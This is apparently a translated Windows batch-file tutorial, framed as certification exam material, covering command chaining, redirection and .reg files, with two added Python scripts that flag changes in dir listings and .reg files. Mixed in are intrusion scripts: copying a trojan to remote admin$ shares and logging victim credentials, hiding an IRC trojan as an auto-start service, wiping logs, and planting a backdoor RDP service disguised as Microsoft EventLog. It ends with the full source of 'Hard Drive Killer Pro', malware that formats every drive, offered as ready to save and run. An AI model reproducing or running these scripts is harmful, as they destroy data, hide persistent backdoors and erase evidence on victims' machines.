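Certification exam batch file tutorial:

2. &&
Usage: first command && second command [&& third command ...]
This form runs several commands from one line. As soon as one command fails, the commands after it are not executed; if no command fails, all of them run to completion. Sample: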
C:\>dir z: && dir c:\Ex4rch
The system cannot find the path specified.

C:\>dir c:\Ex4rch && dir z:
 Volume in drive C has no label.
 Volume Serial Number is 0078-59FB
 Directory of c:\Ex4rch

2002-05-14  23:55    .
2002-05-14  23:55    ..
2002-05-14  23:55    14 sometips.gif
 1 File(s) 14 bytes
 2 Dir(s) 768,671,744 bytes free
The system cannot find the path specified.

This kind of command is convenient when making backups, for example:

dir file://192.168.0.1/database/backup.mdb && copy file://192.168.0.1/database/backup.mdb E:\backup

If backup.mdb exists on the remote server, the copy command runs; if the file does not exist, the copy command is not executed. This usage can stand in for IF exist :)

3. ||
Usage: first command || second command [|| third command ...]
This form also runs several commands from one line, but as soon as one command succeeds, the commands after it are not executed; if no command succeeds, all of them are run. Sample:

C:\Ex4rch>dir sometips.gif || del sometips.gif
 Volume in drive C has no label.
 Volume Serial Number is 0078-59FB
 Directory of C:\Ex4rch

2002-05-14  23:55    14 sometips.gif
 1 File(s) 14 bytes
 0 Dir(s) 768,696,320 bytes free
An example of combining these commands:
sample:
@copy,trojan.exe,\\%1\admin$\system32,&&,if,not,errorlevel,1,echo, IP,%1,USER,%2,PASS,%3,>>victim.txt

IV. Using pipe commands

1. The | command
Usage: first command | second command [| third command ...]
The output of the first command is passed to the second command as its input; this style is very common on Unix. sample:

time /t>>D:\IP.log
netstat -n -p tcp|find ":3389">>D:\IP.log
start Explorer
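Can you see what this is for? Terminal Services lets us define a custom startup program for a user, so the user can be made to run the .bat above at logon, which records the IP address of the user who logged in.

2. >, >> output redirection commands
These redirect the output of a command or program to a specified file. The difference between > and >> is that > clears the existing contents of the file before writing to it, while >> only appends to the file and leaves the existing contents unchanged.

sample1:
echo hello world>c:\hello.txt (stupid example?)

sample2:
DLL trojans are widespread these days. system32 is a good place to hide, and many trojans do their best to get in there; DLL trojans are no exception. To counter this, after installing the system and the necessary applications, we can make a record of the EXE and DLL files in that directory:

Run CMD, change directory to system32, then: dir *.exe>exeback.txt & dir *.dll>dllback.txt

The names of all the EXE and DLL files are now recorded in exeback.txt and dllback.txt respectively. Later, if something looks abnormal but the traditional methods find no problem, consider whether a DLL trojan has slipped into the system. In that case, use the same commands to record the EXE and DLL files under system32 into exeback1.txt and dllback1.txt, then run:

CMD, then: fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>>diff.txt

(This uses the FC command to compare the two sets of DLL and EXE listings and writes the results to diff.txt; the second redirection has to be >> so that it does not overwrite the EXE comparison.) This reveals any extra DLL and EXE files, and by checking their creation time, version, whether they are packed and so on, it is fairly easy to judge whether a DLL trojan has paid a visit. Finding nothing is best. If there is one, do not DEL it directly: first unregister the backdoor DLL with regsvr32 /u trojan.dll, then move it to the Recycle Bin, and if the system shows no abnormal reaction, delete it for good or submit it to an antivirus vendor.

3. <, >&, <&
< reads command input from a file instead of from the keyboard.
>& writes the output of one handle to the input of another handle.
<& reads input from one handle and writes it to the output of another handle.
These are not commonly used, so they are not covered further.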
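The system32 baseline comparison from sample2 above, as an added Python example that is not part of the original tutorial: it parses two saved dir listings and reports files that were added, removed, or changed in size or timestamp, which is easier to triage than raw fc output. The listings below are constructed sample data, the function names are this example's own, and the date format is assumed to be the one shown in the tutorial's dir output.

```python
import re

# One file line of saved `dir` output: date, time, size, name.
# Assumes the yyyy-mm-dd hh:mm layout shown in the tutorial; other locales differ.
# Directory lines carry <DIR> instead of a size and therefore do not match.
DIR_LINE = re.compile(
    r"^(?P<date>\d{4}-\d{2}-\d{2})\s+(?P<time>\d{2}:\d{2})\s+"
    r"(?P<size>[\d,]+)\s+(?P<name>.+?)\s*$"
)


def parse_dir_listing(text):
    """Return {lower-cased file name: (size, 'date time')} from dir output."""
    files = {}
    for line in text.splitlines():
        m = DIR_LINE.match(line)
        if not m:
            continue  # volume header, <DIR> entries, File(s)/Dir(s) summary
        size = int(m.group("size").replace(",", ""))
        stamp = f"{m.group('date')} {m.group('time')}"
        # Windows file names are case-insensitive, so compare in lower case.
        files[m.group("name").lower()] = (size, stamp)
    return files


def compare_listings(baseline_text, current_text):
    """Classify differences between the baseline and a later listing."""
    base = parse_dir_listing(baseline_text)
    cur = parse_dir_listing(current_text)
    common = set(base) & set(cur)
    return {
        "added": sorted(set(cur) - set(base)),
        "removed": sorted(set(base) - set(cur)),
        "changed": sorted(n for n in common if base[n] != cur[n]),
    }


# Constructed sample listings (stand-ins for exeback.txt and exeback1.txt).
BASELINE = r"""
 Volume in drive C has no label.
 Directory of C:\WINNT\system32

2002-05-14  23:55    <DIR>          .
2002-05-14  23:55    <DIR>          ..
2002-05-14  23:55            50,688 alpha.exe
2002-05-14  23:55            66,048 beta tool.exe
               2 File(s)        116,736 bytes
"""

CURRENT = r"""
 Volume in drive C has no label.
 Directory of C:\WINNT\system32

2002-05-14  23:55    <DIR>          .
2002-05-14  23:55    <DIR>          ..
2002-05-14  23:55            50,688 ALPHA.EXE
2002-06-01  03:12            70,144 beta tool.exe
2002-06-01  03:12            12,288 gamma.exe
               3 File(s)        133,120 bytes
"""

if __name__ == "__main__":
    for kind, names in compare_listings(BASELINE, CURRENT).items():
        print(f"{kind}: {names}")
```

A file that keeps its name, size and timestamp but has different contents is not detected by this comparison, just as it is not detected by comparing dir listings with fc.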
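V. How to manipulate the registry with batch files

During an intrusion, specific registry keys and values are often manipulated to achieve a particular purpose, for example deleting leftover values under Run in order to hide a backdoor or trojan, or creating a service that loads a backdoor. Of course, we also modify the registry to harden the system or to change some system property. All of this requires some understanding of registry operations. Below we first learn how to use a .REG file to manipulate the registry. (A batch file can be used to generate a REG file.)
The common registry operations are create, modify and delete.

1. Create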
There are two kinds of creation. One is creating a subkey (Subkey). We create a file with the following content:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]

Then run the script, and a subkey named "hacker" has been created under HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft.

The other is creating a value entry. This file uses the typical format, the same as a file exported from the registry, with the following content:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"="C:\\WINNT\\system32\\door.exe"
"Autodos"=dword:02

This creates three entries under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]: Invader, door and about.
The type of Invader is "String Value".
The type of door is "REG SZ Value".
The type of Autodos is "DWORD Value".
2. Modify
Modifying is relatively simple: export the entry you need to change, edit it in Notepad, then import it again (regedit /s).

3. Delete
First, deleting a value entry. We create a file like this:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-

Run the script, and "Ex4rch" under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] is deleted.

Next, deleting a subkey. We create a script like this:

Windows Registry Editor Version 5.00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]

Run the script, and [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] has been deleted.

Having read this far, you have basically mastered .reg files. The goal now is to use a batch file to create a .reg file with specific content; remember that, as mentioned earlier, the redirection operators make it easy to create files of a particular type.

sample1: Taking the example above, to generate the following registry file

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128

all that is needed is:

@echo Windows Registry Editor Version 5.00>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"="C:\\WINNT\\system32\\door.exe">>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
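Because regedit /s imports a .reg file without any prompt, it helps to see what a file will do before importing it. The following added Python example, which is not from the original tutorial, parses the .reg forms described above (key creation, [-key] deletion, value assignment and "name"=- deletion) and lists the operations that touch Run keys or a service ImagePath; going slightly beyond the forms shown so far, it also decodes hex(2) (REG_EXPAND_SZ) data with \ line continuations. The sample file, the ExampleSvc and Example\Old keys and all function names are constructed for this example.

```python
import re

# Keys whose values start programs automatically (Run, RunOnce, RunServices).
AUTOSTART = re.compile(r"\\CurrentVersion\\Run(Once|Services)?$", re.IGNORECASE)
VALUE_LINE = re.compile(r'^(@|"(?:[^"\\]|\\.)*")\s*=\s*(.*)$')


def unescape(quoted):
    """Strip the surrounding quotes and undo .reg backslash escaping."""
    return re.sub(r"\\(.)", r"\1", quoted[1:-1])


def decode_data(raw):
    """Turn the right-hand side of a value line into (type, value)."""
    raw = raw.strip()
    if raw == "-":
        return ("delete", None)
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        return ("sz", unescape(raw))
    if raw.lower().startswith("dword:"):
        return ("dword", int(raw[6:], 16))
    m = re.match(r"hex(?:\(([0-9a-fA-F]+)\))?:(.*)$", raw)
    if m:
        data = bytes(int(b, 16) for b in re.findall(r"[0-9a-fA-F]{2}", m.group(2)))
        if m.group(1) == "2":  # REG_EXPAND_SZ is stored as UTF-16LE text
            text = data.decode("utf-16-le", errors="replace")
            return ("expand_sz", text.rstrip("\x00"))
        return ("binary", data)
    return ("unknown", raw)


def parse_reg(text):
    """Return a list of (action, key, name, type, value) operations."""
    # Join hex data that was split with a trailing '\' continuation.
    text = re.sub(r"\\[ \t]*\r?\n[ \t]*", "", text)
    ops, key = [], None
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";") or line.startswith("Windows Registry"):
            continue
        if line.startswith("[") and line.endswith("]"):
            key = line[1:-1]
            if key.startswith("-"):          # [-key] deletes the whole key
                ops.append(("delete_key", key[1:], None, None, None))
                key = None
            else:
                ops.append(("create_key", key, None, None, None))
            continue
        m = VALUE_LINE.match(line)
        if m and key:
            name = "(Default)" if m.group(1) == "@" else unescape(m.group(1))
            kind, value = decode_data(m.group(2))
            action = "delete_value" if kind == "delete" else "set_value"
            ops.append((action, key, name, kind, value))
    return ops


def autostart_changes(ops):
    """Operations that add, change or remove something that starts at boot/logon."""
    hits = []
    for action, key, name, kind, value in ops:
        if action == "create_key":
            continue
        is_service_path = bool(name) and name.lower() == "imagepath"
        if AUTOSTART.search(key) or is_service_path:
            hits.append((action, key.rsplit("\\", 1)[-1], name, value))
    return hits


# Constructed sample: the Run values from the tutorial plus a made-up service.
SAMPLE = r'''Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"="C:\\WINNT\\system32\\door.exe"
"Autodos"=dword:02
"Ex4rch"=-

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ExampleSvc]
"Start"=dword:00000002
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
  74,00,25,00,5c,00,61,00,2e,00,65,00,78,00,65,00,00,00

[-HKEY_LOCAL_MACHINE\SOFTWARE\Example\Old]
'''

if __name__ == "__main__":
    for hit in autostart_changes(parse_reg(SAMPLE)):
        print(hit)
```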
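sample2:
When using some of the older trojans today, a value may be created under [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run (Runonce, Runservices, Runexec)] to make the trojan start automatically. But this easily exposes the path of the trojan program, which leads to the trojan being found and removed; by comparison, registering the trojan program as a system service is somewhat safer. The following takes an already configured IRC trojan, DSNX, as the example (named windrv32.exe)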
@start,windrv32.exe,
@attrib,+h,+r,windrv32.exe,
@echo,
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run], >>patch.dll,
@echo,"windsnx,"=-,>>patch.dll,
@sc.exe,create,Windriversrv,type=,kernel,start=,auto,displayname=, WindowsDriver,binpath=,c:\winnt\system32\windrv32.exe, @regedit,/s,patch.dll,
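@delete,patch.dll
@REM [Removes DSNX's startup entry from the registry, uses sc.exe to register it as a critical system service, sets its attributes to hidden and read-only, and configures it to start automatically]
@REM Isn't that safer ^_^

VI. Showcase of examples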
1. A batch file that deletes the default shares on win2k/xp systems
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo preparing to delete all the default shares.when ready press any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleted
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>> c:\delshare.reg
echo "AutoShareWks"=dword:00000000>> c:\delshare.reg
echo "AutoShareServer"=dword:00000000>> c:\delshare.reg
echo Now using the registry file to change the system default properties.
regedit /s c:\delshare.reg
echo Deleting the temporary files.
del c:\delshare.reg
goto :END
:Usage
echo.
echo ------------------------------------------------------
echo.
echo ? A example for batch file ?
echo ? [Use batch file to change the system share properties.] ?
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ? Please enter the share disk you wanna delete ?
echo.
echo For instance to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disk label is not as C: D: E:, Please change it yourself.
echo.
echo example:
echo If local disk label are C: D: E: X: Y: Z:, you should change the command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a using ***
echo.
echo ------------------------------------------------------
goto :EOF
:END
echo.
echo ------------------------------------------------------
echo.
echo OK delshare.bat has deleted all the share you assigned.
echo.Any questions, feel free to mail to Ex4rch@hotmail.com.
echo.
echo.
echo ------------------------------------------------------
echo.
:EOF
echo end of the batch file
------------------------ cut here then save as .bat or .cmd file ---------------------------
2. A batch file for fully hardening the system (patching a compromised host)
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo Windows Registry Editor Version 5.00 >patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters] >>patch.dll
@echo "AutoShareServer"=dword:00000000 >>patch.dll
@echo "AutoShareWks"=dword:00000000 >>patch.dll
@REM [Disable the default shares]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa] >>patch.dll
@echo "restrictanonymous"=dword:00000001 >>patch.dll
@REM [Disable anonymous logon]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] >>patch.dll
@echo "SMBDeviceEnabled"=dword:00000000 >>patch.dll
@REM [Disable file access and print sharing]
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\RemoteRegistry] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule] >>patch.dll
@echo "Start"=dword:00000004 >>patch.dll
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>patch.dll
@echo "ShutdownWithoutLogon"="0" >>patch.dll
@REM [Disable shutdown before logon]
@echo "DontDisplayLastUserName"="1" >>patch.dll
@REM [Do not display the name of the last logged-on user]
@regedit /s patch.dll
------------------------ cut here then save as .bat or .cmd file ---------------------------
The commands below clear all logs on the compromised host, disable some dangerous services, and modify the host's terminal service to leave a way back in.
@regedit,/s,patch.dll,
@net,stop,w3svc,
@net,stop,event,log,
@del,c:\winnt\system32\logfiles\w3svc1\*.*,/f,/q, @del,c:\winnt\system32\logfiles\w3svc2\*.*,/f,/q, @del,c:\winnt\system32\config\*.event,/f,/q, @del,c:\winnt\system32dtclog\*.*,/f,/q,
@del,c:\winnt\*.txt,/f,/q,
@del,c:\winnt\*.log,/f,/q,
@net,start,w3svc,
@net,start,event,log,
@rem [Delete the logs]
@net,stop,lanmanserver,/y,
@net,stop,Schedule,/y,
@net,stop,RemoteRegistry,/y,
@del,patch.dll,
@echo,The,server,has,been,patched,Have,fun., @del,patch.bat,
@REM [Disable some dangerous services.]
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal,
Server\WinStations\RDP-Tcp],>>patch.dll, @echo,"PortNumber"=dword:00002010,>>patch.dll, @echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal,
Server\Wds\rdpwd\Tds\tcp,>>patch.dll, @echo,"PortNumber"=dword:00002012,>>patch.dll, @echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD],
>>patch.dll,
@echo,"Start"=dword:00000002,>>patch.dll,
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService], >>patch.dll,
@echo,"Start"=dword:00000002,>>patch.dll,
@echo,"ErrorControl"=dword:00000001,>>patch.dll,
@echo,
"ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\,
>>patch.dll,
@echo,
74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\,
>>patch.dll,
@echo,
00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00,
>>patch.dll,
@echo,"ObjectName"="LocalSystem",>>patch.dll,
@echo,"Type"=dword:00000010,>>patch.dll,
@echo,"Description"="Keep,record,of,the,program,and,windows', message。",>>patch.dll,
@echo,"DisplayName"="Microsoft,EventLog",>>patch.dll,
@echo,
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\termservice], >>patch.dll,
@echo,"Start"=dword:00000004,>>patch.dll,
@copy,c:\winnt\system32\termsrv.exe,c:\winnt\system32\eventlog.exe
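@REM [Changes the 3389 connection: the port becomes 8210 (00002012 in hexadecimal) and the name becomes Microsoft EventLog, leaving a way back in]

3. Hard Drive Killer Pro Version 4.0 (taking batch files to this level is really not easy.)
------------------------ cut here then save as .bat or .cmd file ---------------------------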
@echo,off,
rem,This,program,is,dedecated,to,a,very,special,person,that,does, not,want,to,be,named.,
:start,
cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
call,attrib,-r,-h,c:\autoexec.bat,>nul,
echo,@echo,off,>c:\autoexec.bat,
echo,call,format,c:,/q,/u,/autoSample,>nul,>>c:\autoexec.bat, call,attrib,+r,+h,c:\autoexec.bat,>nul,
rem,Drive,checking,and,assigning,the,valid,drives,to,the,drive,
variable.set,drive=,
set,alldrive=c,d,e,f,g,h,i,j,k,l,m,n,o,p,q,r,s,t,u,v,w,x,y,z, rem,code,insertion,for,Drive,Checking,takes,place,here., rem,drivechk.bat,is,the,file,name,under,the,root,directory., rem,As,far,as,the,drive,detection,and,drive,variable,settings,, don't,worry,about,how,it,
rem,works,,it's,d\*amn,to,complicated,for,the,average,or,even,the, expert,batch,programmer.,
rem,Except,for,Tom,Lavedas.,
echo,@echo,off,>drivechk.bat,
echo,@prompt,%%%%comspec%%%%,/f,/c,vol,%%%%1:,$b,find,"Vol",>,nul, >{t}.bat,
%comspec%,/e:2048,/c,{t}.bat,>>drivechk.bat,
del,{t}.bat,
echo,if,errorlevel,1,goto,enddc,>>drivechk.bat,
cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
rem,When,errorlevel,is,1,,then,the,above,is,not,true,,if,0,,then, it's,true.,
rem,Opposite,of,binary,rules.,If,0,,it,will,elaps,to,the,next, command.,
echo,@prompt,%%%%comspec%%%%,/f,/c,dir,%%%%1:.\/ad/w/-p,$b,find,
"bytes",>,nul,>{t}.bat,
%comspec%,/e:2048,/c,{t}.bat,>>drivechk.bat,
del,{t}.bat,
echo,if,errorlevel,1,goto,enddc,>>drivechk.bat,
cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
rem,if,errorlevel,is,1,,then,the,drive,specified,is,a,removable, media,drive,-,not,ready.,
rem,if,errorlevel,is,0,,then,it,will,elaps,to,the,next,command., echo,@prompt,dir,%%%%1:.\/ad/w/-p,$b,find,",0,bytes,free",>,nul, >{t}.bat,
%comspec%,/e:2048,/c,{t}.bat,>>drivechk.bat,
del,{t}.bat,
echo,if,errorlevel,1,set,drive=%%drive%%,%%1,>>drivechk.bat, cls,
echo,PLEASE,WAIT,WHILE,PROGRAM,LOADS,.,.,.,
rem,if,it's,errorlevel,1,,then,the,specified,drive,is,a,hard,or, floppy,drive.,
rem,if,it's,not,errorlevel,1,,then,the,specified,drive,is,a,CD-ROM, drive.,
echo,:enddc,>>drivechk.bat,
rem,Drive,checking,insertion,ends,here.,"enddc",stands,for,"end,
dDRIVE,cHECKING".,
rem,Now,we,will,use,the,program,drivechk.bat,to,attain,valid,drive, information.,
:Sampledrv,
for,%%a,in,(%alldrive%),do,call,drivechk.bat,%%a,>nul, del,drivechk.bat,>nul,
if,%drive.==.,set,drive=c,
:form_del,
call,attrib,-r,-h,c:\autoexec.bat,>nul,
echo,@echo,off,>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,format,%%%%a:,/q,/u, /autoSample,>nul,>>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,c:\temp.bat,%%%%a,Bunga,>nul, >>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),call,deltree,/y,%%%%a:\,>nul, >>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,format,%%%%a:,/q,/u, /autoSample,>nul,>>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),do,call,c:\temp.bat,%%%%a,Bunga,>nul, >>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Loading,Windows,,please,wait,while,Microsoft,Windows, recovers,your,system,.,.,.,>>c:\autoexec.bat,
echo,for,%%%%a,in,(%drive%),call,deltree,/y,%%%%a:\,>nul, >>c:\autoexec.bat,
echo,cd\,>>c:\autoexec.bat,
echo,cls,>>c:\autoexec.bat,
echo,echo,Welcome,to,the,land,of,death.,Munga,Bunga's,Multiple, Hard,Drive,Killer,version,4.0.,>>c:\autoexec.bat,
echo,echo,If,you,ran,this,file,,then,sorry,,I,just,made,it.,The,
purpose,of,this,program,is,to,tell,you,the,following.,.,., >>c:\autoexec.bat,
echo,echo,1.,To,make,people,aware,that,security,should,not,be, taken,for,granted.,>>c:\autoexec.bat,
echo,echo,2.,Love,is,important,,if,you,have,it,,truly,,don't,let, go,of,it,like,I,did!,>>c:\autoexec.bat,
echo,echo,3.,If,you,are,NOT,a,vegetarian,,then,you,are,a,murderer,, and,I'm,glad,your,HD,is,dead.,>>c:\autoexec.bat,
echo,echo,4.,Don't,support,the,following:,War,,Racism,,Drugs,and, the,Liberal,Party.>>c:\autoexec.bat,
echo,echo.,>>c:\autoexec.bat,
echo,echo,Regards,,>>c:\autoexec.bat,
echo,echo.,>>c:\autoexec.bat,
echo,echo,Munga,Bunga,>>c:\autoexec.bat,
call,attrib,+r,+h,c:\autoexec.bat,
:makedir,
if,exist,c:\temp.bat,attrib,-r,-h,c:\temp.bat,>nul,
echo,@echo,off,>c:\temp.bat,
echo,%%1:\,>>c:\temp.bat,
echo,cd\,>>c:\temp.bat,
echo,:startmd,>>c:\temp.bat,
echo,for,%%%%a,in,("if,not,exist,%%2\nul,md,%%2","if,exist,%%2\nul,
cd,%%2"),do,%%%%a,>>c:\temp.bat,
echo,for,%%%%a,in,(">bottom_hole.txt"),do,echo,%%%%a,Your,Gone, @$$hole!!!!,>>c:\temp.bat,
echo,if,not,exist,
%%1:\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\%%2\nul,
goto,startmd,>>c:\temp.bat,
call,attrib,+r,+h,c:\temp.bat,>nul,
cls,
echo,Initializing,Variables,.,.,.,
rem,deltree,/y,%%a:\*.,only,eliminates,directories,,hence,leaving, the,file,created,above,for,further,destruction.,
for,%%a,in,(%drive%),do,call,format,%%a:,/q,/u,/autoSample,>nul, cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
for,%%a,in,(%drive%),do,call,c:\temp.bat,%%a,Munga,>nul, cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
echo,Analyzing,System,Structure,.,.,.,
for,%%a,in,(%drive%),call,attrib,-r,-h,%%a:\,/S,>nul, call,attrib,+r,+h,c:\temp.bat,>nul,
call,attrib,+r,+h,c:\autoexec.bat,>nul,
cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
echo,Analyzing,System,Structure,.,.,.,
echo,Initializing,Application,.,.,.,
for,%%a,in,(%drive%),call,deltree,/y,%%a:\*.,>nul, cls,
echo,Initializing,Variables,.,.,.,
echo,Validating,Data,.,.,.,
echo,Analyzing,System,Structure,.,.,.,
echo,Initializing,Application,.,.,.,
echo,Starting,Application,.,.,.,
for,%%a,in,(%drive%),do,call,c:\temp.bat,%%a,Munga,>nul, cls,
echo,Thank,you,for,using,a,Munga,Bunga,product., echo.,
echo,Oh,and,,Bill,Gates,rules,,and,he,is,not,a,geek,,he,is,a,good,
looking,genius.,
echo.,
echo,Here,is,a,joke,for,you,.,.,.,
echo.,
echo,Q).,What's,the,worst,thing,about,being,an,egg?, echo,A).,You,only,get,laid,once.,
echo.,
echo,HAHAHAHA,,get,it?,Don't,you,just,love,that,one?, echo.,
echo,Regards,,
echo.,
echo,Munga,Bunga,
:end,
rem,Hard,Drive,Killer,Pro,Version,4.0,,enjoy!!!!, rem,Author:,Munga,Bunga,-,from,Australia,,the,land,full,of, retarded,Australian's,(help,me,get,out,of,here).,